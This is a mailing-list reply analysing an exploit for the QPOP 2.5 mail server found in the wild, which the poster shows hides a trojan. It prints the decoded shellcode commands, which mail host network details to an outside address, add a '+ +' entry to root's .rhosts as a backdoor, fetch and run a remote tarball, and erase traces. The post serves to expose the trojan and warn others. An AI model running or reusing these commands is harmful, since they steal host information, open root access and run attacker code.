Re: QPOP2.5* exploit ??

[phi-vulndev () EXORSUS NET (phi-vulndev () EXORSUS NET)]

>      this has been found in the wild, however there seems to be a trojan
> in the shellcode.  Popper 2.5* has been thought to be safe.  I would not
> reccomend running this on your own machine unless you crack the
> shellcode and see what it does.

Trivial xor of 2 encoding of part of the shellcode reveals:

/bin/sh -c
/sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null;
echo '+ +' >> ~root/.rhosts;
rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar;
tar -xvf solwar* >> /dev/null;
cd solwar;
chmod +x solwar.sh;
./solwar.sh >> /dev/null;
cd ..;
rm -rf solwar*;

I have yet to totally decode the asm, and don't think I will bother to go
any further, so it is possible it does more than just this, however it
quite obviously isn't a straight qpopper exploit. Anyone tried against a
qpopper install to see if it executes?

Phi.